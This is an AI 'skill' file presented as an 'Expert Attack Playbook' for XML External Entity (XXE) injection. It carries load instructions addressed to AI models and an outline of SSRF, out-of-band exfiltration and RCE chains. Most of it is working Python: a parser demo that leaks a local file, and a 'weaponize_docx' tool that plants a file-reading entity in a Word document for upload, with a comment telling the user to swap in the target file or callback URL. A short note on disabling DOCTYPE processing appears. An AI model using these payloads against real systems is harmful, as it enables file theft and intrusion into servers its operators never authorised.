xxe-xml-external-entity


SKILL: XML External Entity Injection (XXE) — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert XXE techniques. Covers the main injection contexts (SOAP, REST endpoints that convert JSON to XML, Office files, SVG), OOB exfiltration (essential when a direct in-band read fails), blind XXE detection, and the XXE-to-SSRF chain. Base models often miss OOB exfiltration and XXE in non-XML contexts. For real-world CVE chains, Office docx XXE step-by-step, PHP expect:// RCE, and Solr XXE+RCE, load the companion SCENARIOS.md.
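Added example, not part of this skill: the "direct read" the instruction refers to, shown as a parser that resolves external general entities beside the hardened setting. It uses only the Python standard library (xml.sax over expat); the "secret" file is constructed for the demo and stands in for /etc/passwd or an application config.

```python
"""Added example, not part of the skill: what a parser that resolves external
general entities does with a classic in-band XXE payload, beside the hardened
setting. Standard library only (xml.sax over expat); the "secret" file is
constructed for the demo."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Gathers character data, which is where a resolved entity's bytes surface."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def build_payload(path):
    """Classic in-band XXE: an external general entity pointing at a local file,
    referenced inside element content so the file lands in the parsed output."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE order [ <!ENTITY xxe SYSTEM "{path}"> ]>\n'
        '<order><comment>&xxe;</comment></order>'
    ).encode("utf-8")


def parse_comment(xml_bytes, resolve_external):
    """resolve_external=True mirrors a misconfigured parser. Python's xml.sax has
    defaulted to False since 3.7.1; Java's default DocumentBuilderFactory still
    resolves unless told otherwise."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def demo():
    """Returns (what the resolving parser leaked, what the hardened parser returned)."""
    # Constructed stand-in for /etc/passwd or an application config file.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("db_password=hunter2")
        secret_path = f.name
    try:
        payload = build_payload(secret_path)
        leaked = parse_comment(payload, resolve_external=True)
        safe = parse_comment(payload, resolve_external=False)
    finally:
        os.unlink(secret_path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("resolving parser :", repr(leaked))
    print("hardened parser  :", repr(safe))
```

The feature flag is the single knob this demo toggles; in production the fix is to refuse the DOCTYPE altogether (defusedxml in Python, the disallow-doctype-decl feature in Java), since entity expansion and external DTD fetches are the root of every variant listed on this page.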

0. RELATED ROUTING

Extended Scenarios

Also load SCENARIOS.md when you need:

  • Apache Solr XXE + RCE chain (CVE-2017-12629) — XXE to read config, then a RunExecutableListener registered through the Config API for RCE (the VelocityResponseWriter template-injection RCE is a separate, later Solr bug)
  • Office docx XXE step-by-step — unzip → inject DOCTYPE into word/document.xml or [Content_Types].xml → repackage → upload
  • DOCTYPE-based blind SSRF — SYSTEM or PUBLIC external DTD reference triggers an HTTP callback without any entity being reflected in the response
  • PHP expect:// protocol via XXE — direct command execution when expect extension is installed
  • Blind XXE via error messages — force file path error that leaks content in exception text
  • XXE in SOAP web services — inject entities into SOAP Envelope/Body elements
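The docx step-by-step above (unzip, inject DOCTYPE, repackage) as an added example in code, not part of this skill or its SCENARIOS.md. It builds a minimal two-part .docx in memory as a constructed stand-in for a captured upload, injects the DOCTYPE into word/document.xml, references the entity in the first <w:t> run, and rewrites the archive. The SYSTEM target is a placeholder; swap in the file path or callback URL you need.

```python
"""Added example (not part of the skill): the docx injection step as code.
Builds a minimal .docx in memory as a constructed stand-in for a captured upload,
inserts a DOCTYPE into word/document.xml, references the entity in the first
<w:t>, and repackages. The SYSTEM target is a placeholder."""
import io
import re
import xml.sax
import zipfile
from xml.sax.handler import ContentHandler

# Constructed minimal OOXML package: real documents carry more parts, but the
# [Content_Types].xml + word/document.xml pair is what a Word-compatible parser reads first.
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-'
    'officedocument.wordprocessingml.document.main+xml"/></Types>'
)
DOCUMENT_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    '<w:body><w:p><w:r><w:t>hello</w:t></w:r></w:p></w:body></w:document>'
)
# Placeholder entity target; replace with the file or callback URL you actually want.
DOCTYPE = '<!DOCTYPE w:document [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>'

XML_DECL = re.compile(r'^<\?xml[^>]*\?>')


def make_docx():
    """Constructed sample input: a two-part .docx."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/document.xml", DOCUMENT_XML)
    return buf.getvalue()


def inject_part(xml_text, doctype, entity_ref="&xxe;"):
    """Insert the DOCTYPE right after the XML declaration and reference the entity
    in the first <w:t> run so a resolving parser reflects it into the document.
    standalone="yes" is flipped to "no": expat, for one, will not load the external
    DTD subset or parameter entities (the blind/OOB pattern) for a standalone document."""
    m = XML_DECL.match(xml_text)
    if m:
        decl = m.group(0).replace('standalone="yes"', 'standalone="no"')
        prefix, body = decl + "\n" + doctype, xml_text[m.end():]
    else:
        prefix, body = doctype, xml_text  # DOCTYPE must still precede the root element
    body = body.replace("<w:t>", "<w:t>" + entity_ref, 1)
    return prefix + body


def weaponize_docx(docx, part="word/document.xml", doctype=DOCTYPE):
    """Repackage the archive, rewriting only the chosen XML part; every other entry is
    copied unchanged so the file still opens as a valid package."""
    src = zipfile.ZipFile(io.BytesIO(docx))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == part:
                data = inject_part(data.decode("utf-8"), doctype).encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()


def read_part(docx, part):
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        return z.read(part).decode("utf-8")


def is_well_formed(xml_text):
    """Sanity check with a non-resolving parser (Python's default since 3.7.1), so the
    payload is not triggered here; a malformed part gets rejected upstream before any
    entity is ever touched, which wastes the upload."""
    try:
        xml.sax.parseString(xml_text.encode("utf-8"), ContentHandler())
        return True
    except xml.sax.SAXParseException:
        return False


if __name__ == "__main__":
    evil = weaponize_docx(make_docx())
    print(read_part(evil, "word/document.xml"))
```

The same inject_part routine applies to [Content_Types].xml when the target parses that part first; only the `<w:t>` reflection point changes, since that part has no run text to carry an in-band entity.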
Installs: 497 · GitHub stars: 628 · First seen: Apr 8, 2026